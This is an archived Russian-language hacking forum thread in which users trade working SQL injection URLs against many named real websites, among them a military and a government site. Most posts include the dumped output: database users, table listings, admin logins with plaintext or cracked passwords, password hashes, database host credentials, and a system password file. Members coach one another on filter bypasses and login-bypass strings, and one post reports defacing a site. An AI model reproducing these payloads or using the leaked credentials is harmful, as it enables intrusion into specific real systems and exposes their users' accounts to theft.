http://www.mediasoyuz.ru/news/index.php?id=-66+union+select+1,version(),3,concat_ws(user(),cha r(58),database()),5,6,7,8,9,10,11,12/*

a5361_media@localhosta5361_media

KEHT33

12.11.2007, 19:24

http://osnews.com/

http://67.18.254.190/permalink.php?news_id=11384&comment_id=10824+union+select+concat(username,0x2b ,password)+FROM+users/*

Evgesha23

12.11.2007, 21:33

_http://www.deti.bizhttp://www.deti.biz/product.php?s=1&a00=-1+union+select+concat(version(),0x3a,data base(),0x3a,us er()),2,3/* 5.0.45-community-log;detibizo_deti;detibizo_deti@localhost
http://www.deti.biz/product.php?s=1&a00=-1+union+select+TABLE_NA ME,2 ,3+from+INFO RMATION_SCHEMA.TABLES+LIMIT+94,1/*94 таблицы
интересные:users ,users_roll ,sh_user и тд

5taY3r

12.11.2007, 21:41

Не знаю что дальше с этим делать... HELP!
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7, 8,9,10,11,12,13,14/*

x.Elf

12.11.2007, 22:55

Не знаю что дальше с этим делать... HELP!
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7, 8,9,10,11,12,13,14/*
Я думаю тебя смутило это "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'"
Но все просто:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),aE S_DECRYPT(AES_ENCRYPT(version(),0x72),0x72),%208,9 ,10,11,12,13,14/*
AES_DECRYPT(AES_ENCRYPT('строка'),'blabla'), 'blabla') Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.

Dr.Z3r0

12.11.2007, 22:59

Не знаю что дальше с этим делать... HELP!
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7, 8,9,10,11,12,13,14/*
Смотрим версию:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(V ERSION(),0x20),0x20),7,8,9,10,11,12,13,14/*

Ну и начинай таблички подбиратьhttp://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*Заменяя [имя_таблицы] на имя которое возможно будет реальным названием одной из таблиц типа user, users, members и тд небольшой словарик подобного можешь найти воспользовавшись поиском...

После начинай перебирать столбцыhttp://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,[имя_столбца],7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*по аналогии с предыдущим примером

Ну а дальше опять спросишь...

ЗЫ вообще для таких постов есть специальная тема http://forum.antichat.ru/thread46016.html
ЗЫЫ и когда научимся читать статьи по интересующей теме их же не для себя писали так?

l-l00K

12.11.2007, 23:16

flaghouse.com
http://www.flaghouse.com/itemdy00.asp?T1=38525'%20or%201=@@version--&iorb=4764
version: Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
system_user: ecomlive
db_name: Ecomlive

americanmemorabilia.com
http://www.americanmemorabilia.com/Auction_Item.asp?Auction_ID=25746+or+1=@@version--
version: Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
user: AmerMem
db: AmericanMemorabilia

gamerevolution.com
http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),version(), user(),database()),4,5,6,7,8,9,0,11+--+
4.1.21-standard-log:gamerev@10.15.178.62:gamerev
http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),username,u ser_password,user_icq,user_email),4,5,6,7,8,9,0,11 +from+phpbb_users+limit+12,1+--+
dUKE:eea342a57c9313484e2b73715a5cbdb1:froggy
В саму админку попасть не удалось, там стоит дополнительная авторизация

[53x]Shadow

13.11.2007, 01:41

www.esi.mil

POST Инъекция в поле email:
http://www.esi.mil/forgotPassword.asp

version:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

user:esi2005admin
db:ESI2005

Базы:
DONCIODashboard
DONCIOInternetDB
EmailSurvey
ESI2005

ESI2005(Таблы)
AgreementType
AgreementTypeLookup
Audit
Contacts
DesignatedCategory
Final_Price
ManufacturerLookup
Questions
Requirement_Files
Requirement_Specs
Requirements_Changes
Software_Managers
Software_Products
Status
tblProducts
tblForum
tblESA

Интересная Contacts:
idKey
sName
sEmail
sPassword

Например:
webmaster@bcinow.com:ESI8524R

fRg

13.11.2007, 13:35

labootika.com http://www.labootika.com/catalog.php?idproduit=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9/*&cat=1012&PHPSESSID=397829af48e28835dd7cc832800fcad9 4.0.25-standard-log:labootik:labootik@10.0.70.13

доступ к mysql прикрыт

perlasuferintei.ro http://www.perlasuferintei.ro/catalog.php?mod=detaliiCarte&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12/* 4.0.27-standard : perla_perlasuferintei : perla@localhost

maxishop.lv http://www.maxishop.lv/?p=prece&id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*&sad=54.1.16:maxishoputf:maxishoputfuser@localhost

и снова прикрыт доступ к mysql :mad:

DJ_Bes

13.11.2007, 13:37

Сообственно http://www.dom3.ru/blog/view/-5867')+union+select+'hfd'/*/0/196/
+ мне ))ыы

fRg

13.11.2007, 14:22

bazar.glo-con.com http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*&for_sale=Y

109 таблиц:http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+table_name+from+information_schema. tables+limit+109,1/*&for_sale=Y

Поля таблы admin_logins:idlogin
ida
logip
timelog
hashcode
Поля таблы user_logins:idlogin
customer_code
logip
timelog
hashcode

13.11.2007, 19:04

www.royalvideo.ru (продажа фотоаппаратов)
_http://www.royalvideo.ru/news.php?id=3+union+select+1,2,3,version(),5,6
PHP 5.2.4, MySQL 5.0.45-log

Таблица users Колонки: login, id, pass
_http://www.royalvideo.ru/news.php?id=3+union+select+1,pass,3,login,5,6+from +users+limit+1,1
md5(pass) = d9d1b168eac8f197e0576b56cfc23ece
login:pass = admin:d9d1b168eac8f197e0576b56cfc23ece
d9d1b168eac8f197e0576b56cfc23ece:gfhjkm = расшифровал на www.milw0rm.com/md5/info.php
админка : http://www.royalvideo.ru/admin/index.php
был дефейс но ненадолго, часа 3-4.
так же через админку вычитал настроки к БД:

$MYSQLHOST = "u68865.mysql.masterhost.ru";
$MYSQLDB = "u68865_rv";
$MYSQLUSER = "u68865";
$MYSQLPASSWORD = "5ovialkyl7";

ЛифчиС5СВ

13.11.2007, 19:08

Нашел скуль-инж, вывел хэш админа, но админку не нашел! Нашел только cpanel =) ыыы

SQL-inj:
http://www.pariaman.go.id/berita/index.php?id=-1+union+select+1,version(),3,4,5,now(),7,8,9...

CPanel:
http://www.pariaman.go.id/cpanel

Хеш:пароль админа:
0192023a7bbd73250516f069df18b500:admin123

Админку не нашел =(

KEHT33

13.11.2007, 20:08

http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(admin,0x2b,pas s,0x2b,nick,0x2b,icq),6,7,8,9,10+from+users/*

http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(nick,0x2b,pass ),6,7,8,9,10+from+admins/*

http://www.trinitrader.com/product_desc.php?id=121+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26+trader_db_admin/*

kair

14.11.2007, 00:26

www.kochfeuer.de
Softbiz Link Directory Script
http://www.kochfeuer.de/searchresult.php?&sbtype=1&inname=-1,-1&exname=-1,-1&sbcat_id=350000000000000000000/**/union/**/select/**/1,concat_ws(0x3A,table_schema,TABLE_NAME),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20 from%20INFORMATION_SCHEMA.TABLES/*&pg=2

http://www.kochfeuer.de/searchresult.php?&sbtype=1&inname=-1,-1&exname=-1,-1&sbcat_id=350000000000000000000/**/union/**/select/**/1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23%20from%20information_schema.co lumns/*&pg=2

KEHT33

14.11.2007, 01:52

http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,admin,6,nick,icq,9+f rom+algi_users/*
http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,5,6,nick,icq,9+from+ poezje_users/*
БД 5

FoxMALDER

14.11.2007, 01:56

dinaitour.com - туризм в Украине
4.1.20dinaitourdinaitour@localhost
http://www.dinaitour.com/tourism/tour/ukraine/?tour=3&sub=-1+union+select+1,concat_ws(0x05,version(),database (),user()),3,4/*

FoxMALDER

14.11.2007, 01:58

nadejda.com.ua - агенство недвижимости
5.0.45-lognadejda_nadejdanadejda_unadejda@localhost
http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x05,version(),database(),user()),15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38/*
http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38+from+information_schema.column s/*
cities
constypes
flattypes
main
maps
objects
typetypes

FoxMALDER

14.11.2007, 02:01

pizzamarketplace.com - Pizza Marketplace
4.0.27-standardsitedbatmmarketplace@localhost
http://www.pizzamarketplace.com/research.php?rc_id=-1+union+select+concat_ws(0x05,version(),database() ,user()),2,3,4,5,6,7,8,9/*

Проголодались? :D

FoxMALDER

14.11.2007, 02:09

Серия сайтов сделаных студией Granite5 (http://granite5.com/)

4.1.10a-standard-logcenturycareadmin@localhost
http://www.21centurycare.co.uk/vacancydetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x05,version(),database(),user()),0x72),0x72),2,3,4/*

4.1.10a-standard-logallNationsCollegeadmin@localhost
http://www.allnations.ac.uk/newsevent.php?newseventid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x05,version(),database(),user()),0x72),0x72),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27/*&section=Home

4.1.10a-standard-logblueoceanadmin@localhost
http://www.blueoceanpublishing.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-logbmladmin@localhost
http://www.bmlbss.com/news_article.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x05,version(),database(),user()),0x72),0x72),2,3,4 ,5,6/*

4.1.10a-standard-logbournadmin@localhost
http://www.bournschool.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logdruidsadmin@localhost
http://www.boxtreebar.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28/*

4.1.10a-standard-logbremedadmin@localhost
http://www.bremed.co.uk/shop.php?shopcatid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t_ws(0x05,version(),database(),user()),0x72),0x72) ,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.10a-standard-logbullyingmattersadmin@localhost
http://www.bullyingmatters.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-logbosadmin@localhost
http://www.businessofficesupplies.co.uk/news_story.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x05,version(),database(),user()),0x72),0x72),2/*

4.1.10a-standard-logcambridgeblueadmin@localhost
http://www.cambridgeblue.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-loggeniusTemplateadmin@localhost
http://www.caro.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logfelthamsadmin@localhost
http://www.cplfelthams.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logchairs4childrenadmin@localhost
http://www.chairs4children.com/article.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x05,version(),database(),user()),0x72),0x72),3,4 ,5,6,7,8/*

4.1.10a-standard-loggeniusTemplateadmin@localhost
http://www.cliffordburr.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-loggeniusTemplateadmin@localhost
http://www.country-toys.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logcranfieldeg2admin@localhost
http://www.cranfieldelectrical.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-loggeniusTemplateadmin@localhost
http://www.crownhillgarden.com/index.php?pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AE S_ENCRYPT(concat_ws(0x05,version(),database(),user ()),0x72),0x72),12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logcrowoodadmin@localhost
http://www.crowood.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-loggeniusTemplateadmin@localhost
http://www.crtsolutions.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33/*

4.1.10a-standard-logwichitaadmin@localhost
http://www.wichita.co.uk/productdetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x05,version(),database(),user()),0x72),0x72),2,3,4/*

Cambridge University Rugby Club
4.1.10a-standard-logcurufcadmin@localhost
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,version(),database(),user()),0x72),0x72),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32/*

P.S.: Кстати, это далеко не полный список сайтов... Почти половина! :D

K1nD[e]R

14.11.2007, 02:23

http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),user(),da tabase()),2,3,4,5,6,7/*

4.0.26/colorprintru@217.23.152.183/colorprintru

KEHT33

14.11.2007, 02:34

http://www.greenshift.com/news.php?id=-97+UNION+SELECT+1,user,password,4,5,6,7,8,9,10,11, 12+from+mysql.user/*

14.11.2007, 02:49

А вот еще одни нубы )) надо ж так у админа пасс 1234 был :
http://www.apollo-tour.ru/

http://fu2reteam.org/apolo.gif

_http://www.apollo-tour.ru/news.php?id=-3+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6+from+users
admin:1234
админка как обычно : http://www.apollo-tour.ru/admin/index.php

14.11.2007, 02:51

Прошу прощения за рекламу =\ сразу неподумал

K1nD[e]R

14.11.2007, 02:52

http://michaelyoun.com/index.php?id=335+union+select+1,concat(login,0x7c, pass),3,4,5,concat_ws(0x2F,version(),user(),databa se())+from+users+limit+3,3//*

Version : 4.0.17-standard/michael132576@bfb1.hotchilli.net/michael132576

login | Password

Julien | $hAiaSOWw$L.ElrCaZddSXNbczXLln..

neel | $NT1HKLs6$maKjAm5gOFUdNwVnPKDed0

david | $CkfkJS1m$R0Wm0U9U.SewH1gZPqYOS.

marcoa | $zRtxrrzF$x9QdtdsEoDw47todoerT30

DavidHill | $/jrBGNbU$lneMqAV.Nwsk8bYXxsqLb.

Pascal | $tUYKyzOrNMdHIM2AsIYpf9ZnvgYc0

francoisadmin | $GaZJk4Aq$lGLp3Qc7ah45PioM9Mknl/

aroustan | $WXSFA3Ry$H2sDLkEXsCKHpXYIO9hnV/

jcharron | {left}NGNegUI$o4Uub83kCAKzLHetW7UBp.

roussot | $K1e9J0lz$A8trNdKNnQQwyrsNIJy7N.

KEHT33

14.11.2007, 02:56

Прошу прощения за рекламу =\ сразу неподумал
Так удали...тут скрины не надо выставлять...если каждый будет скрин кидать хрен пойми что получится.

http://www.thaitrademe.com/classifieds/product_desc.php?id=-4871+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27/*
БД 5

http://www.classifiedbiz.com/product_desc.php?id=4635+UNION+SELECT+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26/*
4 бд

http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(admin_name,0x3b,pwd),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sba uctions_admin/*
http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(username,0x3b,pwd),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauc tions_members/*
БД 5

K1nD[e]R

14.11.2007, 03:46

http://ukrfoto.dp.ua/download.php?id=-166+union+select+1,concat_ws(0x2F,user(),version() ,database()),3,4,5,6/*

ukrfoto@saturn/4.1.22-log/ukrfoto 3

-MoLoToK-

14.11.2007, 04:23

http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_w s(0x2F,user(),version()%20%20,database())/*
heroesv_bdu@localhost/4.1.20/heroesv_main
Работает только с 9999999.

K1nD[e]R

14.11.2007, 07:43

Агентство недвижимости «ИНСАЙД НОРД ВЕСТ»

http://www.i-nw.ru/news.php?id=9999+union+select+1,version(),3,4,conc at(login,char(58),password),6,7+from+users/*

Version 4.1.20-log/dbu_insidenw_1@192.168.5.21/db_insidenw_1

Admins

secretar:123
luoman:12345
fin:f2inw

K1nD[e]R

14.11.2007, 08:05

http://www.roguegovernment.com/news.php?id=-4682+union+select+1,version(),aes_decrypt(aes_encr ypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6+f rom+mysql.user/*

Version root@localhost/4.1.7/roguegovernment

Admins:

root:6aee13f5467031e6

K1nD[e]R

14.11.2007, 08:16

http://www.pro-tour.ru/news.php?id=772+union+select+1,concat_ws(0x2F,user (),version(),database()),3,4,5,6,7/*

protour@19
----------------------------------------------------------------------------------------------------------

http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(0x2F,version(),use r(),database()),5,6/*

4.1.20-lk-log/clarionrus@localhost/clarionrus

fRg

14.11.2007, 09:05

triennale.it http://www.triennale.it/index.php?lang=_eng&id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,versio n(),database(),user()),43,44,45,46,47,48,49,50/* 55 таблиц:http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,table_name,43,44,45,4 6,47,48,49,50+from+information_schema.tables+limit +54,1/*Насколько я понял, таблица админов - utenti_gestionale:http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,id_ute nte,password),43,44,45,46,47,48,49,50+from+utenti_ gestionale+limit+0,1/*Её поля:id_utente
password
gradoАдминов трое "логин:пасс":triennale:Triennale_6
biglietteria:TrMilano
biglietteriaTBVS:TBVS_На сайте есть SHOP, кому интересно - ковыряйте дальше (я с итальянским как-то не дружу!).

K1nD[e]R

14.11.2007, 09:30

http://www.getsalt.com/news.php?id=-117+union+select+1,2,concat_ws(0x2F,version(),user (),database()),4,5,6,concat_ws(char(58,58),usernam e,password,id),8,9,10,11,12+from+fb_users+limit+3, 3/*

Данные : 5.0.22-log/getsalt@localhost/getsalt

Admins:
Login Password ID

Anneleen test123 2
kikivreeling vre27kik 19

fRg

14.11.2007, 10:49

Вопрос!
Сайт atdr.ro :http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/*Фильтрацию "+" обошёл, а вот concat никак не могу :mad:
Как обойти?
И ещё: при подборе таблиц странная реакция на запрос поля user_password из mysql.user
Кто копнёт глубже - отпишитесь (+)!

fRg

14.11.2007, 13:12

michaelyoun.com http://michaelyoun.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user())/* 4.0.17-standard:michael132576:michael132576@bfb1.hotchill i.net
доступа к mysql нет

elmark.com.plhttp://www.elmark.com.pl/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10/* 5.0.33-log:elmarkautomatyka:elmarkautomatyka@localhost

36 таблиц:http://www.elmark.com.pl/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+ information_schema.tables+limit+35,1/* по названиям таблиц ни админов, ни юзеров, ни другого интересного не нашёл

Elvis000

14.11.2007, 16:15

Classifields - Универсальная бесплатная доска объявлений
http://www.classifields.ru/

http://www.classifields.ru/?field=999999999+union+select+1,2,3,4,5,6,7,TABLE_ NAME,9,version(),11,12,13,14,15+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1/*

COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
class_anekdotes
class_categories
class_links
clicker_ips_lasbber
documents
garbage_0
hotels_k
images_k
kigal_additional
kigal_backlinks
kigal_boxes
kigal_categories
kigal_pages
kigal_sites
lasbber_additional
lasbber_backlinks
lasbber_boxes
lasbber_categories
lasbber_pages
lasbber_sites
li_keywords
li_keywords_categories
links_p2
mail_answers
mail_answers_0
mail_categories
mail_questions
mail_questions_0
mail_users
markt_additional
markt_additional_temp
markt_backlinks
markt_boxes
markt_categories
markt_links
....
147 таблиц

user:catalog1@localhost
ver:5.1.16-beta
database:catalog1

прочитал: # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin drug:*:1001:0:User &:/usr/home/drug:/usr/local/bin/bash mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin a47001:*:1002:1002:User &:/usr/home/a47001:/usr/local/bin/bash phpmyadmin:*:1003:1003:User &:/usr/home/phpmyadmin:/usr/local/bin/bash just:*:1004:1004:User &:/usr/home/just:/usr/local/bin/bash spellen:*:1005:1005:User &:/usr/home/spellen:/usr/local/bin/bash hedgehog:*:1006:1006:User &:/usr/home/hedgehog:/usr/local/bin/bash a47002:*:1007:1007:User &:/home/a47002:/bin/sh a47003:*:1008:1008:User &:/home/a47003:/bin/sh

l-l00K

14.11.2007, 21:28

gamerslogik.com
http://www.gamerslogik.com/preview.php?PrevID=-29+union+select+1,2,concat_ws(char(58),version(),d atabase(),user()),4,5,6,7,8+--+
5.0.24a-standard-log:gl_main:gamersl_malfoy@wilshire.dreamhost.com
http://www.gamerslogik.com/preview.php?PrevID=-29+union+select+1,2,concat_ws(char(58),username,us er_password,user_icq),4,5,6,7,8+from+phpbb_users+l imit+2,1+--+
Admin:
prfectjon:0f80a358117986ddb519d30b4b6c0993:lockhar t
http://gamerslogik.com/phpbb2/

halkfild

14.11.2007, 22:03

[talant.biz]
http://talant.biz/admin/about_vacancy.php?edit_vac=-36+union+select+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3A,VERSION(),USER(),DATABASE()),0x71),0x71),3, 4,5/*

4.1.11-Debian_4sarge2-log:stdimensiy_tal3@85.249.135.1:stdimensiy_tal3

при входе в админку
admin' or 1=1/*
sdsdsd

[docs.nexter.ru]
http://docs.nexter.ru/index.php?mode=1&part_id=111
/home/webadmin/nexter.ru/html/ghost/inc/
/home/webadmin/nexter.ru/html/ghost/admin/inc/files.inc.php
http://docs.nexter.ru/index.php?mode=1&part_id=7+order+by+3/*
http://docs.nexter.ru/news.php?id=3+order+by+4/*
версия 3-ка :'(
http://docs.nexter.ru/news.php?id=3+and+(ascii(substring(VERSION(),1,1)) =51)/*

[semi.com.ua]
/var/www/semi/semi.com.ua/whatis.php
http://www.semi.com.ua/whatis.php?ids=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7/*'
4.1.22:u_semi@localhost:semi

K1nD[e]R

14.11.2007, 22:44

тут не обсуждаются иные темы.....

FoxMALDER

15.11.2007, 00:22

Специально для будущих космонавтов :)
5.0.26-max-logacademyacademy@localhost
